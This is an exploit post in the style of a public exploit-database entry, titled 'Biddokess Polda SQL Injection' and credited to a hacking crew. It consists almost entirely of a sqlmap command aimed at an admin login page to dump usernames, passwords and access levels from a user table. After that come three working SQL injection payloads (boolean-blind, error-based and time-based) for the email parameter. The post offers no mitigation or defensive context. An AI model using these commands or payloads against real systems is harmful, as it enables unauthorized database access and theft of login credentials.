Exploit Title : Biddokess Polda SQL Injection
# Date : 4.04.2020
# Exploit Author : ./s3nt1n3L // Tersakiti Crew
# Tested on : Android 9
POC :
$ ./sqlmap.py -u "http://site.com/admin/index.php" --data="email=dwa&login=Sign In&password=dwadwa" --batch -D dokkes_db -T user -C username,password,level --dump
---
Parameter: email (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: email=dwa' RLIKE (SELECT (CASE WHEN (2687=2687) THEN 0x647761 ELSE 0x28 END))-- kBzP&login=Sign In&password=dwadwa
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: email=dwa' AND (SELECT 8518 FROM(SELECT COUNT(*),CONCAT(0x7162717a71,(SELECT (ELT(8518=8518,1))),0x71787a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ZYTI&login=Sign In&password=dwadwa
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: email=dwa' AND (SELECT 8934 FROM (SELECT(SLEEP(5)))aoHP)-- WoFE&login=Sign In&password=dwadwa
---
Thank's to :
k0v3t - ./0z3r02 - Tersakiti Crew - Ghost Hunter Illusion